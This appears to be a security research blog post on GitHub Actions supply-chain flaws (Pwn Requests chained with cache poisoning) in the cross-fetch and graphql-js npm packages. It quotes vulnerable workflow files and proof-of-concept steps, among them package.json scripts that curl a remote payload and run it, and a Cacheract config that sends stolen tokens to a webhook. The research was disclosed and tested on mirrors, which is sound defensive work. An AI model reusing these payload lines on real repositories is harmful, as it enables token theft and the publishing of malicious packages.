We Hacked the npm Supply Chain of 36 Million Weekly Installs - Lupin & Holmes

We Hacked the npm Supply Chain of 36 Million Weekly Installs

Oct 03, 2025

RONI CARTA | LUPIN

Supply Chain Attack, Hack, Bug Bounty, Depi, Gato-X

Intro

In the past months, our team at Lupin & Holmes has been conducting extensive offensive research into Software Supply Chain vulnerabilities affecting widely used JavaScript libraries. This research was not a one off test or isolated bug hunt, it was part of an ongoing effort to understand how misconfigurations in GitHub Actions pipelines can cascade into systemic weaknesses across the ecosystem. We carried out this work in close collaboration with Adnan Khan, the creator of Gato-X and author of numerous deep technical deep-dives into CI/CD exploitation on his blog. Adnan has been pioneering research on concepts like Pwn Requests and Cache Poisoning in GitHub Actions, and his tooling and methodology have become the de facto standard for weaponizing these classes of bugs. Together, we decided to push this research further, not just proving single exploits, but testing how far these flaws could scale when combined with our platform Depi, designed to resolve entire dependency trees and map their upstream attack surfaces.

Over the course of this research, we coordinated the disclosure of multiple critical issues across high-profile projects. In this article, we are going to focus on two specific case studies:

  • cross-fetch (Reported in March 2025): a foundational fetch polyfill package with more than 20 million weekly downloads, used both directly and indirectly across nearly every JavaScript ecosystem.

  • GraphQL-JS (Reported in May 2025): the reference implementation of GraphQL in JavaScript, with over 16 million weekly downloads (Note: Now it has increased to 19M \o/), powering frameworks like Apollo, Relay, and a vast number of backend services.

Both vulnerabilities stemmed from the same underlying anti-pattern: unsafe GitHub Actions configurations that blurred the boundary between untrusted pull requests and privileged workflows. In both cases, attackers could exploit this misconfiguration via a combination of Pwn Requests (executing arbitrary code in CI from a pull request) and Cache Poisoning (seeding malicious entries that would later be restored in privileged jobs). The end result was the same: the theft of maintainer NPM tokens, which could be used to publish rogue versions of the packages.

What makes these cases particularly striking is not just the technical elegance of the exploits, but the scale of the potential blast radius. With tens of millions of installations per week, a single compromised release of cross-fetch or graphql-js would silently propagate malicious code into thousands of downstream applications, CI/CD pipelines, and developer environments. The vulnerabilities were not limited to hypothetical edge cases; they were concrete, reproducible, and carried a direct path from "open a pull request" to "control the published package".

In this post, we will provide a deep technical breakdown of both attack paths: how the workflows were misconfigured, how we chained Pwn Requests with Cache Poisoning, how we built working Proofs of Concept using Cacheract, and why these issues matter for the security of the wider ecosystem. We will also explain how we scaled this research with Depi + Gato-X, turning what could have been isolated bugs into a systematic mapping of CI/CD attack surfaces across the dependency graph. Finally, we will tie this research to the recent NX compromise, showing how these upstream attack patterns are no longer theoretical but actively weaponized against critical infrastructure.

What’s a Pwn Request ?

A Pwn Request occurs when a privileged workflow executes untrusted pull-request code. Adnan Khan’s 2023 breakdown "One Supply Chain Attack to Rule Them All" explains that workflows triggered by pull_request_target, issue_comment, workflow_run responders, or PR-bot commands are built for convenience. These workflows then quietly grant repository level power such as write-capable GITHUB_TOKEN, repository secrets, deploy keys, and environment secrets.

Attackers from forks can influence those code paths. The most common mistake is using pull_request_target with an explicit checkout of a PR head or merge revision. That checkout often runs lifecycle scripts like npm install, build steps, or test runners. It can also run project controlled tasks such as package.json scripts. At that moment, the attacker’s branch decides what executes.

Here’s a vulnerable pattern distilled from real incidents (simplified). It combines a repo context trigger with a checkout of PR code and lifecycle scripts, exactly the "Pwn Request" antipattern:

# Antipattern: privileged trigger + executes PR code
name: Bot PR Handler
on:
  pull_request_target:
    types: [opened, synchronize, reopened]
permissions:
  contents: write   # repo-context; powerful
  pull-requests: write
jobs:
  build-and-comment:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        # This is the critical flaw: checking out attacker-controlled code
        with:
          ref: ${{ github.event.pull_request.head.sha }}
          persist-credentials: true   # leaves a write-capable token configured
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci --ignore-scripts=false   # runs attacker’s package.json scripts
      - run: npm test                        # attacker can hijack test command too

GitHub Security Lab calls out this pattern as dangerous by design: pull_request_target runs with target repo context and is meant for label/comment automation, not for building the untrusted PR; if you then check out and execute PR-controlled code, you’ve built a privileged trampoline for arbitrary code execution.

The intended model is to process the untrusted PR with the lower privilege pull_request trigger and, if needed, hand off results via artifacts to a second, privileged workflow_run job. Any other shortcut mixes trust boundaries.

Technically, the Pwn-Request kill chain is short and lethal. With a privileged runner processing PR content, the attacker’s PR can:

  1. Hijack build/test steps via preinstall postinstall custom scripts for instance
  2. Read or pivot on the repo scoped GITHUB_TOKEN (especially if actions/checkout left it on disk because persist-credentials: true)
  3. Exfiltrate repository or environment secrets
  4. Set up persistence for later stages (e.g., priming caches or artifacts that future jobs will trust)

The defensive posture is easy: default GITHUB_TOKEN permissions should be least-privileged (GitHub introduced granular controls and defaults; set permissions: explicitly and prefer read-only for CI), avoid pull_request_target unless you truly need repo-context operations, gate privileged actions behind environments with required reviewers, and prefer OIDC-based short-lived cloud tokens over long-lived secrets.

GitHub’s changelogs and blog posts document the move to finer-grained token permissions and OIDC-based deployments specifically to shrink this blast radius. If you must "talk back" to a PR (labels, comments, status), run the build in pull_request, upload artifacts, then let a separate workflow_run job (with repo context) post results, never the other way around. In short: Pwn Requests are rarely "Zero Days" so much as Zero Separation between untrusted inputs and privileged workflows.

Cache Poisoning in a Github Action ? Really ?

The Cache Poisoning technique that Adnan detailed in 2024 (and later weaponized via Cacheract) exploits how the Actions cache is addressed, restored, and saved. When a workflow uses actions/cache (directly) or an action that implicitly caches (e.g., actions/setup-node with cache: npm), GitHub computes a client-controlled cache key and a version and retrieves the most recent match; on a miss, it saves a new cache with those identifiers at job end.

If an attacker first gains code execution in any job that can write caches (often via a Pwn Request in the default branch), they can pre-create or overwrite entries with crafted tarballs that contain extra files beyond dependencies. Because cache restore uses tar extraction and caches can be reused across jobs and across workflows (within repo/ref scoping), the attacker’s injected files resurface later, in a more privileged job or in a release pipeline. The result is cache-native persistence: files the victim didn’t expect to be executable (like an action’s index.js or a post-step script under the _actions directory on the runner) get silently replaced, then execute when the poisoned cache is restored in a future job.

Actions Cache Schema

Adnan dubs one variant "Actions Cache Blasting": once you have the runtime cache URL/token in the job environment, you can shovel multiple entries to seed future keys and "wait" for a cache hit to detonate. The insidious part is that all of this looks like normal cache traffic, and the final privileged job never "runs the attacker’s code" directly, it restores a cache and the cache does the rest.

Cacheract operationalizes the attack: it steals the job’s runtime tokens, predicts or enumerates future cache keys (for example, by hashing package-lock.json the same way setup-node does), and writes tarballs that both place payloads and overwrite on-runner action files the pipeline will inevitably execute (e.g., actions/checkout post-steps). Even after GitHub hardened save-timing semantics (blocking writes after a job concludes), a correctly timed payload that runs during a default-branch job can still set (or "pre-poison") entries, then rely on downstream jobs, including release/publish jobs with registry tokens and provenance, to restore and execute.

Because Actions caches are intentionally immutable by key and write-once, attackers don’t "update" a cache; they race to create the right cache before the victim does, or they create keys that will later become the default-branch key once a PR merges (Dependabot PRs make this startlingly predictable). It’s all "working as intended," which is what makes it effective.

Defenders should understand the official cache semantics (keying, save/restore behavior, branch/ref scoping, restore-keys fallback), and where that intersects with privileged workflows, before deciding where cache is safe to consume. In general, do not consume caches in release/publish jobs; prefer hermetic, cache-free builds for anything that touches signing, provenance, or registry publish.

Simple idea: Let’s go BRRRRRR on the Offensive Security Scanning

Depi x Gato-X

At the heart of our approach is the idea that modern Software Supply Chain security cannot be tackled one repository at a time. With millions of packages, transitive dependencies, and constantly changing CI/CD pipelines, the attack surface is simply too large to handle manually. This is why we built Depi, our SaaS platform dedicated to offensive supply-chain security. Ok I know it sounds a bit like a marketing paragraph, but I swear it’s important to understand what we did next ! :D

Depi performs what we call full dependency tree resolution: starting from a target project, it recursively maps out every direct and indirect dependency, and for each one, it follows the links back to their upstream Git repositories, build systems, and CI/CD configurations. Instead of only asking "is this package malicious?" Depi asks the deeper question: "what links of trust exist between this package, its maintainers, and the workflows that build and release it?".

By doing so, Depi transforms what looks like a flat list of packages versions into a graph of attack surfaces, where every edge is a potential compromise path, from developer machines to build pipelines to registry publish tokens.

But resolving the graph is only the first half of the story. Finding connections does not automatically prove exploitation. To scale this kind of research, we needed a way to stress-test thousands of GitHub Actions pipelines automatically. This is where Gato-X, created by Adnan Khan, comes into play.

Gato-X is essentially an Open Source Exploitation Framework for CI/CD: it knows how to detect Pwn Requests and how to escalate from an unprivileged pull request into the theft of sensitive credentials like NPM_TOKEN or GITHUB_TOKEN.

Adnan has been documenting these classes of attacks for years on his blog, and Gato-X encodes that knowledge into automation. On its own, Gato-X is a powerful tool to analyze a single repository’s workflows and tell you whether they are exploitable. Combined with Depi, it becomes something else entirely: a scalable exploitation pipeline. Depi enumerates the full ecosystem of dependencies, repositories, and workflows; Gato-X ingests them and runs its suite of attacks; and the results are fed back into Depi as structured findings. This integration means we don’t just know where the weak spots are, we can validate how they break, at scale.

The end result for us as researchers is simple: we feed in a large corpus of targets coming from thousands of Bug Bounty Programs, and then we just sit back and wait for the results to surface. What comes back is not noise, but a prioritized map of real compromise paths, PR workflows that leak tokens, caches that can be poisoned, release jobs that can be hijacked. This loop closes the gap between research and operations, letting us research upstream exploits at scale. It’s not just scalable scanning, it’s scalable exploitation research.

Introducing Cross-Fetch

Cross-Fetch is a lightweight fetch polyfill that works seamlessly across Node.js and browsers. It is used everywhere: frontend frameworks, server-side applications, and even tooling libraries. With over 20 million weekly downloads, its footprint is enormous, and any compromise would ripple downstream instantly into thousands of other packages and applications.

alt_text

In March 2025, during the first scan of Depi x Gato-X scan in Research Mode (not available to our customers at the time), we uncovered a GitHub Actions misconfiguration in Cross-Fetch’s CI/CD setup. The flaw allowed attackers to escalate from a simple Pwn Request into Cache Poisoning, ultimately stealing the NPM_TOKEN used in the release pipeline.

The PR Workflow (pr.yml) - The Entry Point

The vulnerable entrypoint was the PR validation workflow, designed to test contributions from forks. At the time, it looked like this:

# .github/workflows/pr.yml
name: v4.x pull requests

on:
  pull_request_target:
    types:
    - opened
    - edited
    - synchronize
    branches:
    - v4.x

jobs:
  prlint:
    name: Validate PR title
    runs-on: ubuntu-latest
    steps:
    - uses: amannn/action-semantic-pull-request@v4
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

  debug:
    name: Debug
    runs-on: ubuntu-latest
    steps:
    - uses: hmarr/debug-action@v3

  install:
    name: Install
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
      with:
        ref: ${{ github.event.pull_request.head.sha }}
    - name: Cache node_modules
      id: cacheModules
      uses: actions/cache@v4
      with:
        path: ~/.npm # this is cache where npm installs from before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - name: Install dependencies
      if: steps.cacheModules.outputs.cache-hit != 'true'
      run: npm install

  checks:
    name: Checks
    needs: [install]
    uses: ./.github/workflows/checks.yml
    with:
      ref: ${{ github.event.pull_request.head.sha }}

Why this is vulnerable:

  1. Attacker controls code → PR head commit is checked out.
  2. Dangerous execution → npm install executes lifecycle scripts (preinstall, postinstall, etc.) from attacker’s package.json.
  3. Cache write → setup-node is configured with cache: npm, meaning dependencies are cached. Attacker code can poison this cache by injecting malicious files.

This gave attackers the ability to run arbitrary code in the CI runner and then prime a cache entry that would later be trusted in privileged jobs.

The Release Workflow (release.yml) - The Escalation

The escalation vector came from the release workflow. Maintainers used this workflow to publish new versions of Cross-Fetch to npm. Critically, it reused the same cache entries that the PR workflow could write into.

# .github/workflows/release.yml
name: v4.x releases

on:
  push:
    branches:
    # Pushes to the branch below will test the release workflow without
    # publishing version on npm or generating new git tags
    - v4.x-test
    tags:
    - 'v4.[0-9]+.[0-9]+'
    - 'v4.[0-9]+.[0-9]+-alpha.[0-9]+'
    - 'v4.[0-9]+.[0-9]+-beta.[0-9]+'

jobs:
  install:
    name: Install
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - name: Cache node_modules
      id: cacheModules
      uses: actions/cache@v4
      with:
        path: ~/.npm # cache where "npm install" uses before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - name: Install dependencies
      if: steps.cacheModules.outputs.cache-hit != 'true'
      run: npm install

  debug:
    name: Debug
    runs-on: ubuntu-latest
    steps:
    - uses: hmarr/debug-action@v3

  checks:
    name: Check
    needs: [install]
    uses: ./.github/workflows/checks.yml
    with:
      ref: ${{ github.sha }}

  # The security job can't run on pull requests opened from forks because
  # Github doesn't pass down the SNYK_TOKEN environment variable.
  security:
    name: Check Security
    needs: [install]
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - uses: actions/cache@v4
      with:
        path: ~/.npm # cache where "npm install" uses before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - run: npm install --prefer-offline
    - run: make secure
      env:
        SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}

  publish:
    name: Publish to NPM registry
    runs-on: ubuntu-latest
    needs: [checks, security]
    steps:
    - uses: actions/checkout@v4
    - uses: actions/setup-node@v4
      with:
        node-version-file: '.nvmrc'
        # Setup .npmrc file to publish to npm
        registry-url: 'https://registry.npmjs.org'
    - uses: actions/cache@v4
      with:
        path: ~/.npm # this is cache where npm installs from before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - run: npm install --prefer-offline
    - run: make publish
      env:
        NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

Why this is catastrophic:

  1. Cache restoration: The setup-node action restored the cache entry, poisoned by attacker code during a PR run.

  2. Code execution inside privileged job: When poisoned cache contents were unpacked, attacker-controlled files could hijack execution paths (e.g., overwriting node_modules/.bin/*, post-steps, or action files).

  3. Secrets exposed: This release workflow carried the NPM_TOKEN, which is required for publishing to npm. Once poisoned cache code is executed, the token could be exfiltrated.

Building the Proof of Concept with Cacheract

To demonstrate impact, we used Cacheract, Adnan Khan’s tool for exploiting GitHub Actions Cache Poisoning. Here’s how we built the PoC:

Step 1: Mirror Setup

  • Imported cross-fetch into a private test repository (VictimRepo).

  • Added a dummy NPM_TOKEN secret to simulate the real release token.

  • Forked the repo (AttackerRepo) to simulate an attacker’s PR.

Step 2 : Craft the Payload

Configured Cacheract with a webhook:

// src/config.ts in Cacheract
export const DISCORD_WEBHOOK: string = "<webhook URL>";
export const REPLACEMENTS: Replacement[] = [];
export const EXPLICIT_ENTRIES: ManualCacheEntry[] = [
  {
    key: "Linux-node-<predictable-hash>", // derived from package-lock.json
    version: "<version-hash>"
  }
];

Built the payload with:

npm run build-dev

Then hosted the generated bundle.js in a GitHub Gist.

Modified package.json in the attacker’s fork to deploy payload:

"scripts": {
  "preinstall": "curl -sSfL <CACHERACT_GIST_URL> > /tmp/run.js && node /tmp/run.js"
}

To Cache

Cached

Step 3: Trigger the Exploit

  1. Opened a PR → triggered pr.yml.

    • Our malicious preinstall executed.
    • Payload primed a cache entry with attacker code.
  2. Maintainer simulated a release (git tag v4.2.0 → push).

    • release.yml consumed the poisoned cache.
    • Payload executed inside a privileged publish job.
    • Dummy NPM_TOKEN exfiltrated to webhook.

Cacheract

Introducing GraphQL-JS

GraphQL-JS is the reference implementation of GraphQL in JavaScript, maintained in the graphql/graphql-js repository. It sits at the core of the ecosystem, with 16 million weekly installations across backend frameworks, APIs, and developer tooling. Because of this central role, a compromise of GraphQL-JS would have enormous downstream impact: from developer tooling to production of GraphQL servers.

GraphQL JS

In May 2025, during another run of Depi x Gato-X in research mode, we uncovered a GitHub Actions bot misconfiguration in the GraphQL-JS CI/CD pipeline. The issue was another Pwn Request chained with Cache Poisoning . Combined, they exposed the project’s NPM_CANARY_PR_PUBLISH_TOKEN, which has publish rights to GraphQL on npm. In other words, an attacker could escalate from "comment on a pull request" to "publish a rogue version of GraphQL-JS.

The Bot Workflow (github-actions-bot.yml) - The Entry Point

The vulnerability exists because of the GitHubActionsBot workflow. This workflow runs on an issue_comment trigger, which means it runs on comments to pull requests or issues.

name: GitHubActionsBot
on:
  issue_comment:
    types:
      - created

  # We need to be call in context of the main branch to have write permissions
  # "pull_request" target is called in context of a fork
  # "pull_request_target" is called in context of the repository but not necessary latest main
  workflow_run:
    workflows:
      - PullRequestOpened
    types:
      - completed

The workflow proceeds to parse the command structure. @github-actions publish-pr-on-npm is a command that PR creators can use to publish their PR on npm as a canary version. The workflow appears to take measures to protect against unauthorized code or confusing the workflow into publishing unauthorized version upgrade, but there is an alternate vector to obtain the secret.

 cmd-publish-pr-on-npm:
    needs: [accept-cmd]
    if: needs.accept-cmd.outputs.cmd == 'publish-pr-on-npm'
    uses: ./.github/workflows/cmd-publish-pr-on-npm.yml
    with:
      pullRequestJSON: ${{ needs.accept-cmd.outputs.pullRequestJSON }}
    secrets:
      NPM_CANARY_PR_PUBLISH_TOKEN: ${{ secrets.NPM_CANARY_PR_PUBLISH_TOKEN }}

The bot workflow invokes another reusable workflow, cmd-publish-pr-on-npm.yml. Within the workflow it checks out the merge commit SHA and then calls npm run build:npm. This maps to "build:npm": "node resources/build-npm.js" within the package.json file from the PR creator.

This means that the PR creator can run arbitrary code in the context of the build-npm-dist job.

jobs:
  build-npm-dist:
  runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v2
        with:
          persist-credentials: false
          ref: ${{ fromJSON(inputs.pullRequestJSON).merge_commit_sha }}

      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          cache: npm
          node-version-file: '.node-version'

      - name: Install Dependencies
        run: npm ci --ignore-scripts

      - name: Build NPM package
        run: npm run build:npm

We determined based on historical runs that the job has a GITHUB_TOKEN with full write access. This would allow a serious impact to the repository, but the primary objective is the NPM token. The job proceeds to upload the build package artifact.

build npm dist

The next job, publish-canary, downloads the artifact and publishes it as a canary. The job carefully sanitizes the package name and avoids running any code. However, there is a way to pivot to it and run arbitrary code. We can see that the workflow sets up nodejs with cache: npm. This means it consumes the GitHub Actions cache. Since the previous job runs in the context of the same main branch and has access to a GITHUB_TOKEN with write access, we can leverage GitHub Actions Cache Poisoning with Cacheract to run arbitrary code in this job and capture the NPM token.

 publish-canary:
    runs-on: ubuntu-latest
    name: Publish Canary
    environment: canary-pr-npm
    needs: [build-npm-dist]
    steps:
      - name: Checkout repo
        uses: actions/checkout@v2
        with:
          persist-credentials: false

      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          cache: npm
          node-version-file: '.node-version'
          # 'registry-url' is required for 'npm publish'
          registry-url: 'https://registry.npmjs.org'

      - uses: actions/download-artifact@v4
        with:
          name: npmDist
          path: npmDist

This job has a deployment environment canary-pr-npm, but the environment has no protection rules:

{
 "total_count": 5,
  "environments": [
    {
      "id": 403896839,
      "node_id": "EN_kwDOAkiGZM4YEvoH",
      "name": "canary-pr-npm",
      "url": "https://api.github.com/repos/graphql/graphql-js/environments/canary-pr-npm",
      "html_url": "https://github.com/graphql/graphql-js/deployments/activity_log?environments_filter=canary-pr-npm",
      "created_at": "2022-02-12T12:32:33Z",
      "updated_at": "2022-02-12T12:32:33Z",
      "can_admins_bypass": true,
      "protection_rules": [

      ],
      "deployment_branch_policy": null
    }
}

You can determine this by going to https://api.github.com/repos/graphql/graphql-js/environments

Building the Proof of Concept with Cacheract

To validate this attack, we reproduced it using Cacheract. The steps mirrored the Cross-Fetch PoC:

Step 1: Mirror Setup

  • Imported the official graphql/graphql-js repo into a controlled VictimRepo.
  • Added a dummy NPM_CANARY_PR_PUBLISH_TOKEN secret.
  • Forked the repo (AttackerRepo) to simulate an external contributor.

Step 2: Craft Payload

Configured Cacheract with a webhook for exfiltration:

// src/config.ts
export const DISCORD_WEBHOOK: string = "<webhook URL>";
export const REPLACEMENTS: Replacement[] = [];
export const EXPLICIT_ENTRIES: ManualCacheEntry[] = [
  {
    key: "node-cache-Linux-x64-npm-<predictable-hash>",
    version: "<cache-version>"
  }
];

Built the payload with:

npm run build

Hosted the generated dist.js in a GitHub Gist. Modified package.json in the attacker’s PR branch:

"scripts": {
  "npm:build": "node resources/build-npm.js && curl -sSfL <CACHERACT_GIST_URL> > /tmp/run.js && node /tmp/run.js"
}

Step 3: Trigger Exploit

  1. Attacker opens a PR and comments @github-actions publish-pr-on-npm.

  2. Bot workflow runs → executes attacker’s npm:build script.

  3. Payload poisons npm cache.

  4. Maintainer triggers canary publish.

  5. publish-canary job restores poisoned cache → payload executes.

  6. Dummy NPM_CANARY_PR_PUBLISH_TOKEN exfiltrated to webhook.

Impact

This vulnerability chain highlights the three pillars of CI/CD exploitation:

  • Confidentiality: Theft of maintainer tokens (NPM_CANARY_PR_PUBLISH_TOKEN).
  • Integrity: Ability to publish malicious GraphQL versions directly to npm.
  • Availability: Potential to disrupt downstream frameworks and APIs relying on GraphQL.

The lesson is clear: never run untrusted PR code in workflows that carry secrets, and never restore caches across trust boundaries.

Conclusion

When we step back and look at the full story of Cross-Fetch and GraphQL-JS, a disturbing truth emerges: vulnerabilities in CI/CD aren’t isolated bugs, they are systemwide bridges that let attackers walk from innocuous pull requests all the way into trusted release pipelines. Every dependency you adopt, every workflow you automate, and every cache you restore isn’t just part of your build, it’s an integral thread in your Software Supply Chain. If any upstream link is misaligned, it can tear down the integrity of everything downstream.

The real danger is that upstream security is no longer "someone else’s problem." The moment you depend on shared libraries, you inherit not only their code but their trust boundaries, their workflow configurations, and their secrets. When trust boundaries are blurred, when build jobs run untrusted code or caches are reused across privilege zones, you’ve essentially rented an attacker an escalator straight into your core credentials. That’s why the supply chain must shift from being a passive concern to being a strategic security frontier.

Our work with Depi and Gato-X is an invitation: embrace active, large-scale discovery and validation of CI trust surfaces. Don’t wait for a disaster to probe your dependencies, proactively map how code, workflows, and cache boundaries connect across your ecosystem. Because until we treat upstream components as components of our threat model, attackers will continue to weaponize the very convenience we’ve built into modern automation.